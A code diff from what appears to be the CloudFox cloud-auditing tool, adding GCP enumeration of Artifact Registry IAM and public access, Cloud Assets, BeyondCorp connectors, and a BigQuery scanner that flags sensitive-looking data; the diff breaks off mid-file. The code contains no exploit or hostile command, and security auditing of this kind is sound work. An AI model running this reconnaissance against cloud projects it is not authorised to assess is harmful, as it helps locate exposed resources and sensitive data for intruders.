+ }, + RawClient: client, + }, + Session: session, + } + return ars, nil +} + var logger internal.Logger // RepositoriesAndArtifacts retrieves both repositories and their artifacts for a given projectID. @@ -46,7 +88,7 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Retrieve repositories. repos, err := ars.Repositories(projectID) if err != nil { - return combinedInfo, fmt.Errorf("failed to retrieve repositories: %v", err) + return combinedInfo, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } combinedInfo.Repositories = repos @@ -64,7 +106,9 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Fetch artifacts for the current repository. artifacts, err := ars.Artifacts(projectID, location, repositoryName) if err != nil { - logger.InfoM(fmt.Sprintf("Failed to retrieve artifacts for repository %s: %v", repositoryName, err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Failed to retrieve artifacts for repository %s", repositoryName)) continue // Optionally continue to the next repository or handle error differently. } combinedInfo.Artifacts = append(combinedInfo.Artifacts, artifacts...) 
@@ -100,20 +144,110 @@ func (ars *ArtifactRegistryService) Repositories(projectID string) ([]Repository return nil, err } - repositories = append(repositories, RepositoryInfo{ - Name: repo.Name, - Format: repo.Format.String(), - Description: repo.Description, - SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), - ProjectID: projectID, - Location: location, - }) + repoInfo := RepositoryInfo{ + Name: repo.Name, + Format: repo.Format.String(), + Description: repo.Description, + SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), + ProjectID: projectID, + Location: location, + Mode: repo.Mode.String(), + Labels: repo.Labels, + RegistryType: "artifact-registry", + } + + // Parse encryption + if repo.KmsKeyName != "" { + repoInfo.EncryptionType = "CMEK" + repoInfo.KMSKeyName = repo.KmsKeyName + } else { + repoInfo.EncryptionType = "Google-managed" + } + + // Parse cleanup policies + if repo.CleanupPolicies != nil { + repoInfo.CleanupPolicies = len(repo.CleanupPolicies) + } + + // Parse timestamps + if repo.CreateTime != nil { + repoInfo.CreateTime = repo.CreateTime.AsTime().Format(time.RFC3339) + } + if repo.UpdateTime != nil { + repoInfo.UpdateTime = repo.UpdateTime.AsTime().Format(time.RFC3339) + } + + // Get IAM policy for the repository + iamBindings, isPublic, publicAccess := ars.getRepositoryIAMPolicy(ctx, repo.Name) + repoInfo.IAMBindings = iamBindings + repoInfo.IsPublic = isPublic + repoInfo.PublicAccess = publicAccess + + repositories = append(repositories, repoInfo) } } return repositories, nil } +// getRepositoryIAMPolicy retrieves the IAM policy for a repository +func (ars *ArtifactRegistryService) getRepositoryIAMPolicy(ctx context.Context, repoName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + // Get raw client for IAM operations + client, ok := ars.Client.RawClient.(*artifactregistry.Client) + if !ok || client == nil { + return bindings, false, "Unknown" + } + + 
// Get IAM policy + req := &iampb.GetIamPolicyRequest{ + Resource: repoName, + } + + policy, err := client.GetIamPolicy(ctx, req) + if err != nil { + // Return empty bindings if we can't get the policy + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, binding := range policy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + // Artifacts fetches the artifacts for a given repository, handling different formats. func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, repositoryName string) ([]ArtifactInfo, error) { ctx := context.Background() @@ -128,7 +262,7 @@ func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, // Fetch repository details to determine its format repo, err := ars.Client.GetRepository(ctx, &artifactregistrypb.GetRepositoryRequest{Name: repoFullName}) if err != nil { - return nil, fmt.Errorf("failed to get repository details: %v", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } // Handle different repository formats @@ -151,21 +285,33 @@ func parseDockerImageName(imageName string) DockerImageDetails { // Split the image name by '/' parts := strings.Split(imageName, "/") - // Extract details based on the known structure of the image name. 
- // Assuming the format is always consistent as described. + // Validate expected format: projects/{project}/locations/{location}/repositories/{repo}/dockerImages/{image@digest} + if len(parts) < 8 { + return DockerImageDetails{ImageName: imageName} + } + projectID := parts[1] location := parts[3] repository := parts[5] // The image name and digest are after the last '/', separated by '@' imageAndDigest := strings.Split(parts[7], "@") imageName = imageAndDigest[0] - digest := imageAndDigest[1] + digest := "" + if len(imageAndDigest) > 1 { + digest = imageAndDigest[1] + } + + // URL-decode the image name (e.g., "library%2Fnginx" -> "library/nginx") + decodedImageName, err := url.PathUnescape(imageName) + if err != nil { + decodedImageName = imageName // fallback to original if decode fails + } return DockerImageDetails{ ProjectID: projectID, Location: location, Repository: repository, - ImageName: imageName, + ImageName: decodedImageName, Digest: digest, } } @@ -192,17 +338,38 @@ func (ars *ArtifactRegistryService) DockerImages(repositoryName string) ([]Artif // Parse image name to extract detailed information. details := parseDockerImageName(image.Name) - // Populate the ArtifactInfo structure with Docker image details. 
- artifacts = append(artifacts, ArtifactInfo{ + // Build version from tags or digest + version := details.Digest + if len(image.Tags) > 0 { + version = image.Tags[0] // Use first tag as version + } + + artifact := ArtifactInfo{ Name: details.ImageName, Format: "DOCKER", Location: details.Location, Repository: details.Repository, SizeBytes: fmt.Sprintf("%d", image.ImageSizeBytes), - Updated: image.UpdateTime.AsTime().String(), Digest: details.Digest, ProjectID: details.ProjectID, - }) + Tags: image.Tags, + MediaType: image.MediaType, + URI: image.Uri, + Version: version, + } + + // Parse timestamps + if image.UpdateTime != nil { + artifact.Updated = image.UpdateTime.AsTime().Format(time.RFC3339) + } + if image.UploadTime != nil { + artifact.Uploaded = image.UploadTime.AsTime().Format(time.RFC3339) + } + if image.BuildTime != nil { + artifact.BuildTime = image.BuildTime.AsTime().Format(time.RFC3339) + } + + artifacts = append(artifacts, artifact) } return artifacts, nil @@ -227,10 +394,80 @@ func (ars *ArtifactRegistryService) projectLocations(projectID string) ([]string break } if err != nil { - return nil, fmt.Errorf("failed to list locations: %w", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } locations = append(locations, loc.LocationId) } return locations, nil } + +// ContainerRegistryRepositories enumerates legacy Container Registry (gcr.io) repositories +// Container Registry stores images in Cloud Storage buckets, so we check for those buckets +func (ars *ArtifactRegistryService) ContainerRegistryRepositories(projectID string) []RepositoryInfo { + var repositories []RepositoryInfo + + // Container Registry uses specific bucket naming conventions: + // - gcr.io -> artifacts.{project-id}.appspot.com (us multi-region) + // - us.gcr.io -> us.artifacts.{project-id}.appspot.com + // - eu.gcr.io -> eu.artifacts.{project-id}.appspot.com + // - asia.gcr.io -> asia.artifacts.{project-id}.appspot.com + + gcrLocations := []struct { 
+	hostname string
+	location string
+	}{
+	{"gcr.io", "us"},
+	{"us.gcr.io", "us"},
+	{"eu.gcr.io", "eu"},
+	{"asia.gcr.io", "asia"},
+	}
+
+	for _, gcr := range gcrLocations {
+	// Create a repository entry for potential GCR location
+	// Note: We can't easily verify if the bucket exists without storage API access
+	// This creates potential entries that the command can verify
+	repo := RepositoryInfo{
+	Name: fmt.Sprintf("%s/%s", gcr.hostname, projectID),
+	Format: "DOCKER",
+	Description: fmt.Sprintf("Legacy Container Registry at %s", gcr.hostname),
+	ProjectID: projectID,
+	Location: gcr.location,
+	Mode: "STANDARD_REPOSITORY",
+	EncryptionType: "Google-managed",
+	RegistryType: "container-registry",
+	PublicAccess: "Unknown", // Would need storage bucket IAM check
+	}
+	repositories = append(repositories, repo)
+	}
+
+	return repositories
+}
+
+// GetMemberType extracts the member type from a GCP IAM member string
+func GetMemberType(member string) string {
+	switch {
+	case member == "allUsers":
+	return "PUBLIC"
+	case member == "allAuthenticatedUsers":
+	return "ALL_AUTHENTICATED"
+	case strings.HasPrefix(member, "user:"):
+	return "User"
+	case strings.HasPrefix(member, "serviceAccount:"):
+	return "ServiceAccount"
+	case strings.HasPrefix(member, "group:"):
+	return "Group"
+	case strings.HasPrefix(member, "domain:"):
+	return "Domain"
+	case strings.HasPrefix(member, "projectOwner:"):
+	return "ProjectOwner"
+	case strings.HasPrefix(member, "projectEditor:"):
+	return "ProjectEditor"
+	case strings.HasPrefix(member, "projectViewer:"):
+	return "ProjectViewer"
+	case strings.HasPrefix(member, "deleted:"):
+	return "Deleted"
+	default:
+	return "Unknown"
+	}
+}
diff --git a/gcp/services/artifactRegistryService/artifactRegistryService_test.go b/gcp/services/artifactRegistryService/artifactRegistryService_test.go
index db90e10d..1a24e596 100644
--- a/gcp/services/artifactRegistryService/artifactRegistryService_test.go
+++ 
b/gcp/services/artifactRegistryService/artifactRegistryService_test.go @@ -157,7 +157,8 @@ func TestArtifacts(t *testing.T) { SizeBytes: "1024", ProjectID: "project1", Digest: "sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", - Updated: "1970-01-01 00:00:00 +0000 UTC", + URI: "us-central1-docker.pkg.dev/project1/repo1/image1@sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", + Version: "sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", }, }, expectError: false, @@ -215,12 +216,16 @@ func TestRepositories(t *testing.T) { }, expectedRepositories: []artifactRegistryService.RepositoryInfo{ { - Name: "projects/project1/locations/us-central1/repositories/repo1", - Format: "DOCKER", - Description: "Test repository", - SizeBytes: "0", - ProjectID: "project1", - Location: "us-central1", + Name: "projects/project1/locations/us-central1/repositories/repo1", + Format: "DOCKER", + Description: "Test repository", + SizeBytes: "0", + ProjectID: "project1", + Location: "us-central1", + Mode: "MODE_UNSPECIFIED", + EncryptionType: "Google-managed", + RegistryType: "artifact-registry", + PublicAccess: "Unknown", }, }, expectError: false, diff --git a/gcp/services/artifactRegistryService/models.go b/gcp/services/artifactRegistryService/models.go index 24f3ca37..92253a2d 100644 --- a/gcp/services/artifactRegistryService/models.go +++ b/gcp/services/artifactRegistryService/models.go @@ -5,6 +5,7 @@ import ( artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -15,27 +16,58 @@ type CombinedRepoArtifactInfo struct { Artifacts []ArtifactInfo `json:"artifacts"` } +// IAMBinding represents a single IAM binding on a repository +type IAMBinding struct { + Role string `json:"role"` 
+ Members []string `json:"members"` +} + // ArtifactInfo represents the basic information of an artifact within a registry. type ArtifactInfo struct { - Name string `json:"name"` - Format string `json:"format"` - Version string `json:"version"` - Location string `json:"location"` - Repository string `json:"repository"` - SizeBytes string `json:"virtualSize"` - Updated string `json:"updated"` - Digest string `json:"digest"` - ProjectID string `json:"projectID"` + Name string `json:"name"` + Format string `json:"format"` + Version string `json:"version"` + Location string `json:"location"` + Repository string `json:"repository"` + SizeBytes string `json:"virtualSize"` + Updated string `json:"updated"` + Uploaded string `json:"uploaded"` + BuildTime string `json:"buildTime"` + Digest string `json:"digest"` + ProjectID string `json:"projectID"` + Tags []string `json:"tags"` + MediaType string `json:"mediaType"` + URI string `json:"uri"` } // RepositoryInfo holds information about a repository and its artifacts. 
type RepositoryInfo struct {
+	// Basic info
	Name string `json:"name"`
	Format string `json:"format"`
	Description string `json:"description"`
	SizeBytes string `json:"sizeBytes"`
	ProjectID string `json:"projectID"`
	Location string `json:"location"`
+
+	// Security-relevant fields
+	Mode string `json:"mode"` // STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, REMOTE_REPOSITORY
+	EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK"
+	KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK
+	CleanupPolicies int `json:"cleanupPolicies"` // Number of cleanup policies
+	Labels map[string]string `json:"labels"`
+
+	// Timestamps
+	CreateTime string `json:"createTime"`
+	UpdateTime string `json:"updateTime"`
+
+	// IAM Policy
+	IAMBindings []IAMBinding `json:"iamBindings"`
+	IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers
+	PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "allUsers + allAuthenticatedUsers"
+
+	// Registry type (for differentiating AR vs GCR)
+	RegistryType string `json:"registryType"` // "artifact-registry" or "container-registry"
}

// DockerImageDetails holds the extracted parts from a Docker image name. 
@@ -54,6 +86,7 @@ type ArtifactRegistryClientWrapper struct { LocationLister func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] RepositoryGetter func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) DockerImageLister func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] + RawClient interface{} // Store raw client for IAM operations } func (w *ArtifactRegistryClientWrapper) ListRepositories(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { @@ -74,5 +107,6 @@ func (w *ArtifactRegistryClientWrapper) ListDockerImages(ctx context.Context, re // ArtifactRegistryService provides methods to interact with Artifact Registry resources. type ArtifactRegistryService struct { - Client *ArtifactRegistryClientWrapper + Client *ArtifactRegistryClientWrapper + Session *gcpinternal.SafeSession } diff --git a/gcp/services/assetService/assetService.go b/gcp/services/assetService/assetService.go new file mode 100644 index 00000000..f56441f0 --- /dev/null +++ b/gcp/services/assetService/assetService.go @@ -0,0 +1,333 @@ +package assetservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + asset "cloud.google.com/go/asset/apiv1" + assetpb "cloud.google.com/go/asset/apiv1/assetpb" + "google.golang.org/api/iterator" +) + +type AssetService struct { + session *gcpinternal.SafeSession +} + +func New() *AssetService { + return &AssetService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AssetService { + return &AssetService{session: session} +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string 
`json:"members"` +} + +// AssetInfo represents a Cloud Asset +type AssetInfo struct { + Name string `json:"name"` + AssetType string `json:"assetType"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Labels map[string]string `json:"labels"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy details + HasIAMPolicy bool `json:"hasIamPolicy"` + IAMBindings []IAMBinding `json:"iamBindings"` + IAMBindingCount int `json:"iamBindingCount"` + PublicAccess bool `json:"publicAccess"` +} + +// AssetTypeCount tracks count of assets by type +type AssetTypeCount struct { + AssetType string `json:"assetType"` + Count int `json:"count"` +} + +// Common asset types for filtering +var CommonAssetTypes = []string{ + "compute.googleapis.com/Instance", + "compute.googleapis.com/Disk", + "compute.googleapis.com/Firewall", + "compute.googleapis.com/Network", + "compute.googleapis.com/Subnetwork", + "storage.googleapis.com/Bucket", + "iam.googleapis.com/ServiceAccount", + "iam.googleapis.com/ServiceAccountKey", + "secretmanager.googleapis.com/Secret", + "cloudkms.googleapis.com/CryptoKey", + "cloudfunctions.googleapis.com/Function", + "run.googleapis.com/Service", + "container.googleapis.com/Cluster", + "sqladmin.googleapis.com/Instance", + "pubsub.googleapis.com/Topic", + "pubsub.googleapis.com/Subscription", + "bigquery.googleapis.com/Dataset", + "bigquery.googleapis.com/Table", +} + +// ListAssets retrieves assets for a project, optionally filtered by type +func (s *AssetService) ListAssets(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, 
gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAsset(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// ListAssetsWithIAM retrieves assets with their IAM policies +func (s *AssetService) ListAssetsWithIAM(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_IAM_POLICY, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAssetWithIAM(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// GetAssetTypeCounts returns a summary of asset counts by type +func (s *AssetService) GetAssetTypeCounts(projectID string) ([]AssetTypeCount, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil 
{ + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + counts := make(map[string]int) + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + counts[assetResult.AssetType]++ + } + + var result []AssetTypeCount + for assetType, count := range counts { + result = append(result, AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + + return result, nil +} + +// SearchAllResources searches for resources across the organization or project +func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + req := &assetpb.SearchAllResourcesRequest{ + Scope: scope, + Query: query, + } + + it := client.SearchAllResources(ctx, req) + for { + resource, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := AssetInfo{ + Name: resource.Name, + AssetType: resource.AssetType, + ProjectID: resource.Project, + Location: resource.Location, + DisplayName: resource.DisplayName, + Description: resource.Description, + Labels: resource.Labels, + State: resource.State, + CreateTime: 
resource.CreateTime.String(), + UpdateTime: resource.UpdateTime.String(), + } + + assets = append(assets, info) + } + + return assets, nil +} + +func (s *AssetService) parseAsset(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.Resource != nil { + info.Location = assetResult.Resource.Location + } + + return info +} + +func (s *AssetService) parseAssetWithIAM(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.IamPolicy != nil { + info.HasIAMPolicy = true + info.IAMBindingCount = len(assetResult.IamPolicy.Bindings) + + // Store actual bindings and check for public access + for _, binding := range assetResult.IamPolicy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + info.IAMBindings = append(info.IAMBindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + return info +} + +func extractAssetName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// ExtractAssetTypeShort returns a shortened version of the asset type +func ExtractAssetTypeShort(assetType string) string { + parts := strings.Split(assetType, "/") + if len(parts) == 2 { + return parts[1] + } + return assetType +} diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go new file mode 100644 index 00000000..599520da --- /dev/null +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -0,0 +1,231 @@ +package beyondcorpservice + +import ( + "context" + 
"fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + beyondcorp "google.golang.org/api/beyondcorp/v1" +) + +type BeyondCorpService struct { + session *gcpinternal.SafeSession +} + +func New() *BeyondCorpService { + return &BeyondCorpService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BeyondCorpService { + return &BeyondCorpService{session: session} +} + +// getService returns a BeyondCorp service client using cached session if available +func (s *BeyondCorpService) getService(ctx context.Context) (*beyondcorp.Service, error) { + if s.session != nil { + return sdk.CachedGetBeyondCorpService(ctx, s.session) + } + return beyondcorp.NewService(ctx) +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// AppConnectorInfo represents a BeyondCorp app connector +type AppConnectorInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + PrincipalInfo string `json:"principalInfo"` + ResourceInfo string `json:"resourceInfo"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// AppConnectionInfo represents a BeyondCorp app connection +type AppConnectionInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + Type string `json:"type"` + ApplicationEndpoint string `json:"applicationEndpoint"` + Connectors []string `json:"connectors"` + Gateway string `json:"gateway"` + CreateTime string `json:"createTime"` + UpdateTime string 
`json:"updateTime"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// ListAppConnectors retrieves all BeyondCorp app connectors +func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connectors []AppConnectorInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnectors.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1ListAppConnectorsResponse) error { + for _, connector := range page.AppConnectors { + info := s.parseAppConnector(connector, projectID) + + // Get IAM policy for this connector + iamPolicy, iamErr := service.Projects.Locations.AppConnectors.GetIamPolicy(connector.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connectors = append(connectors, info) + } + return nil + }) + if err != nil { + return connectors, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connectors, nil +} + +// ListAppConnections retrieves all BeyondCorp app connections +func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectionInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connections []AppConnectionInfo + + parent := fmt.Sprintf("projects/%s/locations/-", 
projectID) + req := service.Projects.Locations.AppConnections.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1ListAppConnectionsResponse) error { + for _, conn := range page.AppConnections { + info := s.parseAppConnection(conn, projectID) + + // Get IAM policy for this connection + iamPolicy, iamErr := service.Projects.Locations.AppConnections.GetIamPolicy(conn.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connections = append(connections, info) + } + return nil + }) + if err != nil { + return connections, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connections, nil +} + +func (s *BeyondCorpService) parseAppConnector(connector *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1AppConnector, projectID string) AppConnectorInfo { + info := AppConnectorInfo{ + Name: extractName(connector.Name), + FullName: connector.Name, + ProjectID: projectID, + Location: extractLocation(connector.Name), + DisplayName: connector.DisplayName, + State: connector.State, + CreateTime: connector.CreateTime, + UpdateTime: connector.UpdateTime, + } + + if connector.PrincipalInfo != nil && connector.PrincipalInfo.ServiceAccount != nil { + info.PrincipalInfo = connector.PrincipalInfo.ServiceAccount.Email + } + + if connector.ResourceInfo != nil { + info.ResourceInfo = connector.ResourceInfo.Id + } + + return info +} + +func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1AppConnection, projectID string) AppConnectionInfo { + info := AppConnectionInfo{ + Name: extractName(conn.Name), + FullName: conn.Name, + 
ProjectID: projectID, + Location: extractLocation(conn.Name), + DisplayName: conn.DisplayName, + State: conn.State, + Type: conn.Type, + CreateTime: conn.CreateTime, + UpdateTime: conn.UpdateTime, + } + + if conn.ApplicationEndpoint != nil { + info.ApplicationEndpoint = fmt.Sprintf("%s:%d", conn.ApplicationEndpoint.Host, conn.ApplicationEndpoint.Port) + } + + for _, connector := range conn.Connectors { + info.Connectors = append(info.Connectors, extractName(connector)) + } + + if conn.Gateway != nil { + info.Gateway = extractName(conn.Gateway.AppGateway) + } + + return info +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractLocation(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/bigqueryEnumService/bigqueryEnumService.go b/gcp/services/bigqueryEnumService/bigqueryEnumService.go new file mode 100644 index 00000000..c388d7d5 --- /dev/null +++ b/gcp/services/bigqueryEnumService/bigqueryEnumService.go @@ -0,0 +1,233 @@ +package bigqueryenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigquery "google.golang.org/api/bigquery/v2" +) + +type BigQueryEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BigQueryEnumService { + return &BigQueryEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryEnumService { + return &BigQueryEnumService{session: session} +} + +// SensitiveBQResource represents a BigQuery resource flagged as potentially sensitive. 
+type SensitiveBQResource struct { + ProjectID string `json:"projectId"` + Dataset string `json:"dataset"` + Table string `json:"table"` + Column string `json:"column"` + MatchType string `json:"matchType"` // "name" or "content" + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getBigQueryService returns a BigQuery service client. +func (s *BigQueryEnumService) getBigQueryService(ctx context.Context) (*bigquery.Service, error) { + return bigquery.NewService(ctx) +} + +// EnumerateSensitiveResources scans BigQuery metadata for sensitive resource names. +func (s *BigQueryEnumService) EnumerateSensitiveResources(projectID string, maxTables int, sampleData bool, maxRows int) ([]SensitiveBQResource, error) { + ctx := context.Background() + + service, err := s.getBigQueryService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + contentPatterns := shared.GetContentPatterns() + + var resources []SensitiveBQResource + tableCount := 0 + + // List datasets + datasetsResp, err := service.Datasets.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + for _, ds := range datasetsResp.Datasets { + datasetID := ds.DatasetReference.DatasetId + + // Check dataset name + if match := shared.MatchResourceName(datasetID, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + 